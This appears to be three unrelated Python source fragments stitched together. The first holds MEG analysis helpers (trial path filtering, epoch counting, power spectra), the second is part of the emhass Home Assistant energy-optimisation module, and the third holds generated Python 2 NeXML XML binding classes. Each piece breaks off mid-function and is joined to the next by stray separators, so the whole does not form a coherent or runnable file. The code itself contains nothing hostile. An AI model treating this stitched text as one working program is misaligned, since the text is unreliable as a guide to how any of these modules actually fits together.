selection=['Tr01', 'Tr04'])
Returns
-------
updatedfilter: list
List with path strings
Notes
-------
Be careful that final slicing for 'start' & 'end' is done assuming that
the sorting step was correct. Thus, it is based on index not on finding the
specific start-end values in the string. This was done because the tested
paths had various ways of using Tr (e.g. Tr_1 or Tr_01, or Tr1 or Tr_01) -
what caused inconsistencies in the output.
"""
# Check if arguments are in the correct type
assert isinstance(main_dir, str), 'Argument must be str'
assert isinstance(subject, str), 'Argument must be str'
assert isinstance(extension, str), 'Argument must be str'
# Filtering step based on keywords
firstfilter = glob.glob(main_dir + subject + '/**/*' + extension,
recursive=True)
updatedfilter = firstfilter
print('\n..............NaN keys will be printed.................')
start = None
end = None
selection = None
for key, value in kwargs.items():
# In case the key value is NaN (possible in subjects dataframe)
if not isinstance(value,list) and pd.isnull(value):
print(key + '= NaN')
continue
elif key == 'start':
assert isinstance(value, (int,str,float)), 'Argument must be int or number str'
start = int(value)
elif key == 'end':
assert isinstance(value, (int,str,float)), 'Argument must be int or number str'
end = int(value)
elif key == 'selection':
if isinstance(value, list):
selection = value
elif isinstance(value, str):
selection = value.replace(';',',') # Step that convert ; to , (used in example.csv)
selection = ast.literal_eval(selection)
assert isinstance(selection, list), 'Argument should end up being a list of Tr numbers strings'
assert all(isinstance(item, str) for item in selection), 'Argument must be a list of of Tr numbers strings'
else:
start = None
end = None
selection = None
# Update list accoring to key value
updatedfilter = list(filter(lambda path: value in path, updatedfilter))
# Check if too many arguments were passed!
print('\n..............Checking if input is correct!.................')
#print(start, end, selection)
if (start and end) != None and selection != None:
raise RuntimeError('User should use Start&End OR Selection')
else:
print('All good to continue! \n')
pass
# To find index of Tr (last appearance)
location = updatedfilter[0].rfind('Tr')
# Sort list according to Tr* ending (+1 was necessary to work properly)
updatedfilter.sort(key=lambda path:int(''.join(filter(str.isdigit, path[location+1 :]))))
# After the list is sorted, slice by index.
if (start and end) != None:
print('Start&End were given. \n' +
'-- Start is: ' + str(start) +
'\n--End is: ' + str(end))
updatedfilter = updatedfilter[start-1:end]
# for number in range(start, end):
# updatedfilter = [
# list(filter(lambda k: str(number) in k[location:],
# updatedfilter))[0] for number in range(start, end)
# ]
# After the list is sorted, interesect with selection.
elif selection != None:
print('\nA selection of values was given.' +
'\nThe selection was: ' + str(selection))
updatedlist=[]
for item in selection:
updatedlist += list(filter(lambda path: item + extension in path[location:], updatedfilter))
updatedfilter = updatedlist
return updatedfilter
def make_csv(csv_path, output_path, extension = '.asc'):
"""Function to insert the number of epochs to include in analysis into csv.
Number of epochs is calculated by comparing the number of epochs available
for each subject and including the minimum amount.
Parameters
----------
csv_path : str,
path to the csv containing information on subjects to include
output_path: str,
complete path to output new csv (e.g. '/path/to/folder/new_csv.csv')
extension : str,
file extension of meg files (e.g. '.asc')
default = '.asc'
Returns
-------
None
saves the extended csv to the same directory where found old csv
(i.e. overwrites old csv)
epochs_df: pandas DataFrame,
dataframe containing the filepaths to the epochs included for every subject
"""
df = pd.read_csv(csv_path, delimiter = ',', header =0)
nr_epochs = []
for index, row in df.iterrows():
asc_paths = find_paths(main_dir=row['Path'],
subject=row['Case_ID'],
extension=extension,
timepoint=row['MM'],
atlas=row['Atlas'])
#store nr of epochs available for each subject
nr_epochs.append(len(asc_paths))
#find smallest number of epochs available
min_nr_epochs = min(nr_epochs)
#add start and stop epochs to df
df['Start'] = np.repeat(1,len(df['Path']))
df['End'] = np.repeat(min_nr_epochs, len(df['Path']))
#save new csv file that includes the epochs to analyse
df.to_csv(output_path, index = False, sep = ',')
#load new csv file with start and end epochs
new_csv = pd.read_csv(output_path)
subs = []
paths = []
#search for asc files between start and end epoch range specified in csv
for index, row in new_csv.iterrows():
subs.append(row['Case_ID'])
asc_paths = find_paths(main_dir=row['Path'],
subject=row['Case_ID'],
extension=extension,
timepoint=row['MM'],
atlas=row['Atlas'],
start = row['Start'],
end = row['End'])
#append list of asc_paths for subject to list
paths.append(asc_paths)
#store lists of asc_paths (for every subject) in dataframe
epochs_df = pd.DataFrame(paths)
#index rows to subject IDs
epochs_df.set_index([pd.Index(subs)], 'Subs', inplace = True)
return(epochs_df)
def cal_power_spectrum(timeseries, nr_rois=np.arange(92), fs=1250,
window='hamming', nperseg=4096, scaling='spectrum',
plot_figure=False, title_plot='average power spectrum'):
""" Calculate (and plot) power spectrum of timeseries
Parameters
----------
timeseries: DataFrame with ndarrays
Rows are timepoints, columns are rois/electrodes
Give list with rois/electrodes you want to include,
default=np.arange(92)
fs: int, optional
Sample frequency, default=1250
window: str or tuple, optional
Type of window you want to use, check spectral.py for details,
default='hamming'
nperseg : int, optional
Length of each segment, default=4096
scaling : str, optional
'density' calculates the power spectral density (V**2/Hz), 'spectrum'
calculates the power spectrum (V**2), default='spectrum'
plot_figure: bool
Creates a figure of the mean + std over all rois/electrodes,
default=False
title_plot: str
Give title of the plot, default='average power spectrum'
Returns
-------
f: ndarray
Array with sample frequencies (x-axis of power spectrum plot)
pxx: ndarray
Columns of power spectra for each roi/VE
"""
pxx = np.empty([int(nperseg/2+1), np.size(nr_rois)])
i = 0
for roi in nr_rois:
(f, pxx[:,i]) = signal.welch(timeseries[roi].values, fs, window,
nperseg, scaling=scaling)
i = i + 1
if plot_figure==True:
plt.figure()
plt.plot(f, np.mean(pxx,1), color='teal')
plt.plot(f, np.mean(pxx,1)+np.std(pxx,1), color='teal', linewidth=0.7)
plt.plot(f, np.mean(pxx,1)-np.std(pxx,1), color='teal', linewidth=0.7)
plt.fill_between(f, np.mean(pxx,1)+np.std(pxx,1), np.mean(pxx,1)
-np.std(pxx,1), color='teal', alpha=0.2)
plt.xlim(0, 50)
plt.xlabel('Frequency (Hz)')
plt.title(title_plot)
plt.show()
return f, pxx
def find_nearest(array, value):
""" Find nearest value of interest in array (used for frequencies,
no double value issues)
Parameters
----------
array: array
Give the array in which you want to find index of value nearest-by
value: int or float
The value of interest
Return
------
idx: int
Index of value nearest by value of interest
"""
array = np.asarray(array)
idx = (np.abs(array - value)).argmin()
return idx
def cal_FOOOF_parameters(pxx, f, freq_range=[0.5, 48]):
""" Obtain slope and offset using the FOOOF algorithm
Reference paper: <NAME>, | |
<reponame>davidusb-geek/emhass<gh_stars>10-100
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse, os, pathlib, logging, json, copy, pickle
import pandas as pd
from datetime import datetime, timezone
from typing import Optional
from distutils.util import strtobool
from importlib.metadata import version
from emhass.retrieve_hass import retrieve_hass
from emhass.forecast import forecast
from emhass.optimization import optimization
from emhass import utils
def set_input_data_dict(config_path: pathlib.Path, base_path: str, costfun: str,
params: str, runtimeparams: str, set_type: str, logger: logging.Logger,
get_data_from_file: Optional[bool] = False) -> dict:
"""
Set up some of the data needed for the different actions.
:param config_path: The absolute path where the config.yaml file is located
:type config_path: str
:param costfun: The type of cost function to use for optimization problem
:type costfun: str
:param params: Configuration parameters passed from data/options.json
:type params: str
:param runtimeparams: Runtime optimization parameters passed as a dictionnary
:type runtimeparams: str
:param set_type: Set the type of setup based on following type of optimization
:type set_type: str
:param logger: The passed logger object
:type logger: logging object
:param get_data_from_file: Use data from saved CSV file (useful for debug)
:type get_data_from_file: bool, optional
:return: A dictionnary with multiple data used by the action functions
:rtype: dict
"""
logger.info("Setting up needed data")
# Parsing yaml
retrieve_hass_conf, optim_conf, plant_conf = utils.get_yaml_parse(config_path, params=params)
# Treat runtimeparams
params, optim_conf = utils.treat_runtimeparams(runtimeparams, params, retrieve_hass_conf,
optim_conf, plant_conf, set_type, logger)
# Define main objects
rh = retrieve_hass(retrieve_hass_conf['hass_url'], retrieve_hass_conf['long_lived_token'],
retrieve_hass_conf['freq'], retrieve_hass_conf['time_zone'],
params, base_path, logger, get_data_from_file=get_data_from_file)
fcst = forecast(retrieve_hass_conf, optim_conf, plant_conf,
params, base_path, logger, get_data_from_file=get_data_from_file)
opt = optimization(retrieve_hass_conf, optim_conf, plant_conf,
fcst.var_load_cost, fcst.var_prod_price,
costfun, base_path, logger)
# Perform setup based on type of action
if set_type == "perfect-optim":
# Retrieve data from hass
if get_data_from_file:
with open(pathlib.Path(base_path+'/data/test_df_final.pkl'), 'rb') as inp:
rh.df_final, days_list, var_list = pickle.load(inp)
else:
days_list = utils.get_days_list(retrieve_hass_conf['days_to_retrieve'])
var_list = [retrieve_hass_conf['var_load'], retrieve_hass_conf['var_PV']]
rh.get_data(days_list, var_list,
minimal_response=False, significant_changes_only=False)
rh.prepare_data(retrieve_hass_conf['var_load'], load_negative = retrieve_hass_conf['load_negative'],
set_zero_min = retrieve_hass_conf['set_zero_min'],
var_replace_zero = retrieve_hass_conf['var_replace_zero'],
var_interp = retrieve_hass_conf['var_interp'])
df_input_data = rh.df_final.copy()
# What we don't need for this type of action
P_PV_forecast, P_load_forecast, df_input_data_dayahead = None, None, None
elif set_type == "dayahead-optim":
# Get PV and load forecasts
df_weather = fcst.get_weather_forecast(method=optim_conf['weather_forecast_method'])
P_PV_forecast = fcst.get_power_from_weather(df_weather)
P_load_forecast = fcst.get_load_forecast(method=optim_conf['load_forecast_method'])
df_input_data_dayahead = pd.concat([P_PV_forecast, P_load_forecast], axis=1)
df_input_data_dayahead = utils.set_df_index_freq(df_input_data_dayahead)
df_input_data_dayahead.columns = ['P_PV_forecast', 'P_load_forecast']
params = json.loads(params)
if 'prediction_horizon' in params['passed_data'] and params['passed_data']['prediction_horizon'] is not None:
prediction_horizon = params['passed_data']['prediction_horizon']
df_input_data_dayahead = copy.deepcopy(df_input_data_dayahead)[df_input_data_dayahead.index[0]:df_input_data_dayahead.index[prediction_horizon-1]]
# What we don't need for this type of action
df_input_data, days_list = None, None
elif set_type == "naive-mpc-optim":
# Retrieve data from hass
if get_data_from_file:
with open(pathlib.Path(base_path+'/data/test_df_final.pkl'), 'rb') as inp:
rh.df_final, days_list, var_list = pickle.load(inp)
else:
days_list = utils.get_days_list(1)
var_list = [retrieve_hass_conf['var_load'], retrieve_hass_conf['var_PV']]
rh.get_data(days_list, var_list,
minimal_response=False, significant_changes_only=False)
rh.prepare_data(retrieve_hass_conf['var_load'], load_negative = retrieve_hass_conf['load_negative'],
set_zero_min = retrieve_hass_conf['set_zero_min'],
var_replace_zero = retrieve_hass_conf['var_replace_zero'],
var_interp = retrieve_hass_conf['var_interp'])
df_input_data = rh.df_final.copy()
# Get PV and load forecasts
df_weather = fcst.get_weather_forecast(method=optim_conf['weather_forecast_method'])
P_PV_forecast = fcst.get_power_from_weather(df_weather, set_mix_forecast=True, df_now=df_input_data)
P_load_forecast = fcst.get_load_forecast(method=optim_conf['load_forecast_method'], set_mix_forecast=True, df_now=df_input_data)
df_input_data_dayahead = pd.concat([P_PV_forecast, P_load_forecast], axis=1)
df_input_data_dayahead = utils.set_df_index_freq(df_input_data_dayahead)
df_input_data_dayahead.columns = ['P_PV_forecast', 'P_load_forecast']
params = json.loads(params)
if 'prediction_horizon' in params['passed_data'] and params['passed_data']['prediction_horizon'] is not None:
prediction_horizon = params['passed_data']['prediction_horizon']
df_input_data_dayahead = copy.deepcopy(df_input_data_dayahead)[df_input_data_dayahead.index[0]:df_input_data_dayahead.index[prediction_horizon-1]]
elif set_type == "publish-data":
df_input_data, df_input_data_dayahead = None, None
P_PV_forecast, P_load_forecast = None, None
days_list = None
else:
logger.error("The passed action argument and hence the set_type parameter for setup is not valid")
# The input data dictionnary to return
input_data_dict = {
'root': base_path,
'retrieve_hass_conf': retrieve_hass_conf,
'rh': rh,
'opt': opt,
'fcst': fcst,
'df_input_data': df_input_data,
'df_input_data_dayahead': df_input_data_dayahead,
'P_PV_forecast': P_PV_forecast,
'P_load_forecast': P_load_forecast,
'costfun': costfun,
'params': params,
'days_list': days_list
}
return input_data_dict
def perfect_forecast_optim(input_data_dict: dict, logger: logging.Logger,
save_data_to_file: Optional[bool] = True, debug: Optional[bool] = False) -> pd.DataFrame:
"""
Perform a call to the perfect forecast optimization routine.
:param input_data_dict: A dictionnary with multiple data used by the action functions
:type input_data_dict: dict
:param logger: The passed logger object
:type logger: logging object
:param save_data_to_file: Save optimization results to CSV file
:type save_data_to_file: bool, optional
:param debug: A debug option useful for unittests
:type debug: bool, optional
:return: The output data of the optimization
:rtype: pd.DataFrame
"""
logger.info("Performing perfect forecast optimization")
# Load cost and prod price forecast
df_input_data = input_data_dict['fcst'].get_load_cost_forecast(
input_data_dict['df_input_data'],
method=input_data_dict['fcst'].optim_conf['load_cost_forecast_method'])
df_input_data = input_data_dict['fcst'].get_prod_price_forecast(
df_input_data, method=input_data_dict['fcst'].optim_conf['prod_price_forecast_method'])
opt_res = input_data_dict['opt'].perform_perfect_forecast_optim(df_input_data, input_data_dict['days_list'])
# Save CSV file for analysis
if save_data_to_file:
filename = 'opt_res_perfect_optim_'+input_data_dict['costfun']
else: # Just save the latest optimization results
filename = 'opt_res_latest'
if not debug:
opt_res.to_csv(input_data_dict['root'] + '/data/' + filename + '.csv', index_label='timestamp')
return opt_res
def dayahead_forecast_optim(input_data_dict: dict, logger: logging.Logger,
save_data_to_file: Optional[bool] = False, debug: Optional[bool] = False) -> pd.DataFrame:
"""
Perform a call to the day-ahead optimization routine.
:param input_data_dict: A dictionnary with multiple data used by the action functions
:type input_data_dict: dict
:param logger: The passed logger object
:type logger: logging object
:param save_data_to_file: Save optimization results to CSV file
:type save_data_to_file: bool, optional
:param debug: A debug option useful for unittests
:type debug: bool, optional
:return: The output data of the optimization
:rtype: pd.DataFrame
"""
logger.info("Performing day-ahead forecast optimization")
# Load cost and prod price forecast
df_input_data_dayahead = input_data_dict['fcst'].get_load_cost_forecast(
input_data_dict['df_input_data_dayahead'],
method=input_data_dict['fcst'].optim_conf['load_cost_forecast_method'])
df_input_data_dayahead = input_data_dict['fcst'].get_prod_price_forecast(
df_input_data_dayahead, method=input_data_dict['fcst'].optim_conf['prod_price_forecast_method'])
opt_res_dayahead = input_data_dict['opt'].perform_dayahead_forecast_optim(
df_input_data_dayahead, input_data_dict['P_PV_forecast'], input_data_dict['P_load_forecast'])
# Save CSV file for publish_data
if save_data_to_file:
today = datetime.now(timezone.utc).replace(hour=0, minute=0, second=0, microsecond=0)
filename = 'opt_res_dayahead_'+today.strftime("%Y_%m_%d")
else: # Just save the latest optimization results
filename = 'opt_res_latest'
if not debug:
opt_res_dayahead.to_csv(input_data_dict['root'] + '/data/' + filename + '.csv', index_label='timestamp')
return opt_res_dayahead
def naive_mpc_optim(input_data_dict: dict, logger: logging.Logger,
save_data_to_file: Optional[bool] = False, debug: Optional[bool] = False) -> pd.DataFrame:
"""
Perform a call to the naive Model Predictive Controller optimization routine.
:param input_data_dict: A dictionnary with multiple data used by the action functions
:type input_data_dict: dict
:param logger: The passed logger object
:type logger: logging object
:param save_data_to_file: Save optimization results to CSV file
:type save_data_to_file: bool, optional
:param debug: A debug option useful for unittests
:type debug: bool, optional
:return: The output data of the optimization
:rtype: pd.DataFrame
"""
logger.info("Performing naive MPC optimization")
# Load cost and prod price forecast
df_input_data_dayahead = input_data_dict['fcst'].get_load_cost_forecast(
input_data_dict['df_input_data_dayahead'],
method=input_data_dict['fcst'].optim_conf['load_cost_forecast_method'])
df_input_data_dayahead = input_data_dict['fcst'].get_prod_price_forecast(
df_input_data_dayahead, method=input_data_dict['fcst'].optim_conf['prod_price_forecast_method'])
# The specifics params for the MPC at runtime
prediction_horizon = input_data_dict['params']['passed_data']['prediction_horizon']
soc_init = input_data_dict['params']['passed_data']['soc_init']
soc_final = input_data_dict['params']['passed_data']['soc_final']
def_total_hours = input_data_dict['params']['passed_data']['def_total_hours']
opt_res_naive_mpc = input_data_dict['opt'].perform_naive_mpc_optim(
df_input_data_dayahead, input_data_dict['P_PV_forecast'], input_data_dict['P_load_forecast'],
prediction_horizon, soc_init, soc_final, def_total_hours)
# Save CSV file for publish_data
if save_data_to_file:
today = datetime.now(timezone.utc).replace(hour=0, minute=0, second=0, microsecond=0)
filename = 'opt_res_naive_mpc_'+today.strftime("%Y_%m_%d")
else: # Just save the latest optimization results
filename = 'opt_res_latest'
if not debug:
opt_res_naive_mpc.to_csv(input_data_dict['root'] + '/data/' + filename + '.csv', index_label='timestamp')
return opt_res_naive_mpc
def publish_data(input_data_dict: dict, logger: logging.Logger,
save_data_to_file: Optional[bool] = False) -> pd.DataFrame:
"""
Publish the data obtained from the optimization results.
:param input_data_dict: A dictionnary with multiple data used by the action functions
:type input_data_dict: dict
:param logger: The passed logger object
:type logger: logging object
:param save_data_to_file: If True we will read data from optimization results in dayahead CSV file
:type save_data_to_file: bool, optional
:return: The output data of the optimization readed from a CSV file in the data folder
:rtype: pd.DataFrame
"""
logger.info("Publishing data to HASS instance")
# Check if a day ahead optimization has been performed (read CSV file)
if save_data_to_file:
today = datetime.now(timezone.utc).replace(hour=0, minute=0, second=0, microsecond=0)
filename = 'opt_res_dayahead_'+today.strftime("%Y_%m_%d")
else:
filename = 'opt_res_latest'
if not os.path.isfile(input_data_dict['root'] + '/data/' + filename + '.csv'):
logger.error("File not found error, run an optimization task first.")
else:
opt_res_latest = pd.read_csv(input_data_dict['root'] + '/data/' + filename + '.csv', index_col='timestamp')
opt_res_latest.index = pd.to_datetime(opt_res_latest.index)
opt_res_latest.index.freq = input_data_dict['retrieve_hass_conf']['freq']
# Estimate the current index
now_precise = datetime.now(input_data_dict['retrieve_hass_conf']['time_zone']).replace(second=0, microsecond=0)
if input_data_dict['retrieve_hass_conf']['method_ts_round'] == 'nearest':
idx_closest = opt_res_latest.index.get_indexer([now_precise], method='nearest')[0]
elif input_data_dict['retrieve_hass_conf']['method_ts_round'] == 'first':
idx_closest = opt_res_latest.index.get_indexer([now_precise], method='ffill')[0]
elif input_data_dict['retrieve_hass_conf']['method_ts_round'] == 'last':
idx_closest = opt_res_latest.index.get_indexer([now_precise], method='bfill')[0]
if idx_closest == -1:
idx_closest = opt_res_latest.index.get_indexer([now_precise], method='nearest')[0]
# Publish PV forecast
input_data_dict['rh'].post_data(opt_res_latest['P_PV'], idx_closest,
'sensor.p_pv_forecast', "W", "PV Power Forecast")
# Publish Load forecast
input_data_dict['rh'].post_data(opt_res_latest['P_Load'], idx_closest,
'sensor.p_load_forecast', "W", "Load Power Forecast")
cols_published = ['P_PV', 'P_Load']
# Publish deferrable loads
for k in range(input_data_dict['opt'].optim_conf['num_def_loads']):
if "P_deferrable{}".format(k) not in opt_res_latest.columns:
logger.error("P_deferrable{}".format(k)+" was not found in results DataFrame. Optimization task may need to be relaunched or | |
in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('tokens', node)
if value is not None and 'tokens' not in already_processed:
already_processed.append('tokens')
try:
self.tokens = int(value)
except ValueError, exp:
raise_parse_error(node, 'Bad integer attribute: %s' % exp)
if self.tokens <= 0:
raise_parse_error(node, 'Invalid PositiveInteger')
self.validate_MSTokenLength(self.tokens) # validate type MSTokenLength
value = find_attr_value_('states', node)
if value is not None and 'states' not in already_processed:
already_processed.append('states')
self.states = value
value = find_attr_value_('codon', node)
if value is not None and 'codon' not in already_processed:
already_processed.append('codon')
try:
self.codon = int(value)
except ValueError, exp:
raise_parse_error(node, 'Bad integer attribute: %s' % exp)
if self.codon < 0:
raise_parse_error(node, 'Invalid NonNegativeInteger')
self.validate_CodonPosition(self.codon) # validate type CodonPosition
super(AbstractChar, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
super(AbstractChar, self).buildChildren(child_, node, nodeName_, True)
pass
# end class AbstractChar
class AbstractStates(IDTagged):
"""A container for a set of AbstractState elements."""
subclass = None
superclass = IDTagged
def __init__(self, about=None, meta=None, label=None, id=None, state=None, polymorphic_state_set=None, uncertain_state_set=None, set=None, valueOf_=None):
super(AbstractStates, self).__init__(about, meta, label, id, )
if state is None:
self.state = []
else:
self.state = state
if polymorphic_state_set is None:
self.polymorphic_state_set = []
else:
self.polymorphic_state_set = polymorphic_state_set
if uncertain_state_set is None:
self.uncertain_state_set = []
else:
self.uncertain_state_set = uncertain_state_set
if set is None:
self.set = []
else:
self.set = set
def factory(*args_, **kwargs_):
if AbstractStates.subclass:
return AbstractStates.subclass(*args_, **kwargs_)
else:
return AbstractStates(*args_, **kwargs_)
factory = staticmethod(factory)
def get_state(self): return self.state
def set_state(self, state): self.state = state
def add_state(self, value): self.state.append(value)
def insert_state(self, index, value): self.state[index] = value
def get_polymorphic_state_set(self): return self.polymorphic_state_set
def set_polymorphic_state_set(self, polymorphic_state_set): self.polymorphic_state_set = polymorphic_state_set
def add_polymorphic_state_set(self, value): self.polymorphic_state_set.append(value)
def insert_polymorphic_state_set(self, index, value): self.polymorphic_state_set[index] = value
def get_uncertain_state_set(self): return self.uncertain_state_set
def set_uncertain_state_set(self, uncertain_state_set): self.uncertain_state_set = uncertain_state_set
def add_uncertain_state_set(self, value): self.uncertain_state_set.append(value)
def insert_uncertain_state_set(self, index, value): self.uncertain_state_set[index] = value
def get_set(self): return self.set
def set_set(self, set): self.set = set
def add_set(self, value): self.set.append(value)
def insert_set(self, index, value): self.set[index] = value
def export(self, outfile, level, namespace_='', name_='AbstractStates', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed, namespace_, name_='AbstractStates')
outfile.write(' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"')
if 'xsi:type' not in already_processed:
outfile.write(' xsi:type="AbstractStates"')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
showIndent(outfile, level)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='AbstractStates'):
super(AbstractStates, self).exportAttributes(outfile, level, already_processed, namespace_, name_='AbstractStates')
def exportChildren(self, outfile, level, namespace_='', name_='AbstractStates', fromsubclass_=False):
super(AbstractStates, self).exportChildren(outfile, level, namespace_, name_, True)
for state_ in self.get_state():
state_.export(outfile, level, namespace_, name_='state')
for polymorphic_state_set_ in self.get_polymorphic_state_set():
polymorphic_state_set_.export(outfile, level, namespace_, name_='polymorphic_state_set')
for uncertain_state_set_ in self.get_uncertain_state_set():
uncertain_state_set_.export(outfile, level, namespace_, name_='uncertain_state_set')
for set_ in self.set:
set_.export(outfile, level, namespace_, name_='set')
def hasContent_(self):
if (
self.state or
self.polymorphic_state_set or
self.uncertain_state_set or
self.set or
super(AbstractStates, self).hasContent_()
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='AbstractStates'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
super(AbstractStates, self).exportLiteralAttributes(outfile, level, already_processed, name_)
def exportLiteralChildren(self, outfile, level, name_):
super(AbstractStates, self).exportLiteralChildren(outfile, level, name_)
showIndent(outfile, level)
outfile.write('state=[\n')
level += 1
for state_ in self.state:
showIndent(outfile, level)
outfile.write('model_.AbstractState(\n')
state_.exportLiteral(outfile, level, name_='AbstractState')
showIndent(outfile, level)
outfile.write('),\n')
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('polymorphic_state_set=[\n')
level += 1
for polymorphic_state_set_ in self.polymorphic_state_set:
showIndent(outfile, level)
outfile.write('model_.AbstractPolymorphicStateSet(\n')
polymorphic_state_set_.exportLiteral(outfile, level, name_='AbstractPolymorphicStateSet')
showIndent(outfile, level)
outfile.write('),\n')
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('uncertain_state_set=[\n')
level += 1
for uncertain_state_set_ in self.uncertain_state_set:
showIndent(outfile, level)
outfile.write('model_.AbstractUncertainStateSet(\n')
uncertain_state_set_.exportLiteral(outfile, level, name_='AbstractUncertainStateSet')
showIndent(outfile, level)
outfile.write('),\n')
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('set=[\n')
level += 1
for set_ in self.set:
showIndent(outfile, level)
outfile.write('model_.StateSet(\n')
set_.exportLiteral(outfile, level, name_='StateSet')
showIndent(outfile, level)
outfile.write('),\n')
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
super(AbstractStates, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'state':
type_name_ = child_.attrib.get('{http://www.w3.org/2001/XMLSchema-instance}type')
if type_name_ is None:
type_name_ = child_.attrib.get('type')
if type_name_ is not None:
type_names_ = type_name_.split(':')
if len(type_names_) == 1:
type_name_ = type_names_[0]
else:
type_name_ = type_names_[1]
class_ = globals()[type_name_]
obj_ = class_.factory()
obj_.build(child_)
else:
raise NotImplementedError(
'Class not implemented for <state> element')
self.state.append(obj_)
elif nodeName_ == 'polymorphic_state_set':
type_name_ = child_.attrib.get('{http://www.w3.org/2001/XMLSchema-instance}type')
if type_name_ is None:
type_name_ = child_.attrib.get('type')
if type_name_ is not None:
type_names_ = type_name_.split(':')
if len(type_names_) == 1:
type_name_ = type_names_[0]
else:
type_name_ = type_names_[1]
class_ = globals()[type_name_]
obj_ = class_.factory()
obj_.build(child_)
else:
raise NotImplementedError(
'Class not implemented for <polymorphic_state_set> element')
self.polymorphic_state_set.append(obj_)
elif nodeName_ == 'uncertain_state_set':
type_name_ = child_.attrib.get('{http://www.w3.org/2001/XMLSchema-instance}type')
if type_name_ is None:
type_name_ = child_.attrib.get('type')
if type_name_ is not None:
type_names_ = type_name_.split(':')
if len(type_names_) == 1:
type_name_ = type_names_[0]
else:
type_name_ = type_names_[1]
class_ = globals()[type_name_]
obj_ = class_.factory()
obj_.build(child_)
else:
raise NotImplementedError(
'Class not implemented for <uncertain_state_set> element')
self.uncertain_state_set.append(obj_)
elif nodeName_ == 'set':
obj_ = StateSet.factory()
obj_.build(child_)
self.set.append(obj_)
super(AbstractStates, self).buildChildren(child_, node, nodeName_, True)
# end class AbstractStates
class AbstractState(IDTagged):
"""The AbstractState type is the super-class for a state definition.
The element has a required symbol attribute that in restricted
concrete subclasses must be of a sensible type such as a single
IUPAC character. It may enclose zero or more AbstractMapping
elements to resolve ambiguities."""
subclass = None
superclass = IDTagged
def __init__(self, about=None, meta=None, label=None, id=None, symbol=None, valueOf_=None):
super(AbstractState, self).__init__(about, meta, label, id, )
self.symbol = _cast(None, symbol)
pass
def factory(*args_, **kwargs_):
if AbstractState.subclass:
return AbstractState.subclass(*args_, **kwargs_)
else:
return AbstractState(*args_, **kwargs_)
factory = staticmethod(factory)
def get_symbol(self): return self.symbol
def set_symbol(self, symbol): self.symbol = symbol
def export(self, outfile, level, namespace_='', name_='AbstractState', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed, namespace_, name_='AbstractState')
outfile.write(' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"')
if 'xsi:type' not in already_processed:
outfile.write(' xsi:type="AbstractState"')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
showIndent(outfile, level)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='AbstractState'):
super(AbstractState, self).exportAttributes(outfile, level, already_processed, namespace_, name_='AbstractState')
if self.symbol is not None and 'symbol' not in already_processed:
already_processed.append('symbol')
outfile.write(' symbol=%s' % (quote_attrib(self.symbol), ))
def exportChildren(self, outfile, level, namespace_='', name_='AbstractState', fromsubclass_=False):
super(AbstractState, self).exportChildren(outfile, level, namespace_, name_, True)
def hasContent_(self):
if (
super(AbstractState, self).hasContent_()
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='AbstractState'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
if self.symbol is not None and 'symbol' not in already_processed:
already_processed.append('symbol')
showIndent(outfile, level)
outfile.write('symbol = %s,\n' % (self.symbol,))
super(AbstractState, self).exportLiteralAttributes(outfile, level, already_processed, name_)
def exportLiteralChildren(self, outfile, level, name_):
super(AbstractState, self).exportLiteralChildren(outfile, level, name_)
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('symbol', node)
if value is not None and 'symbol' not in already_processed:
already_processed.append('symbol')
self.symbol = value
super(AbstractState, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
super(AbstractState, self).buildChildren(child_, node, nodeName_, True)
pass
# end class AbstractState
class ContinuousChar(AbstractChar):
"""A concrete implementation of the char element, which requires only
an id attribute."""
subclass = None
superclass = AbstractChar
def __init__(self, about=None, meta=None, label=None, id=None, tokens=None, states=None, codon=None, valueOf_=None):
super(ContinuousChar, self).__init__(about, meta, label, id, tokens, states, codon, )
self.states = _cast(None, states)
self.tokens = _cast(None, tokens)
self.codon = _cast(None, codon)
if meta is None:
self.meta = []
else:
self.meta = meta
def factory(*args_, **kwargs_):
if ContinuousChar.subclass:
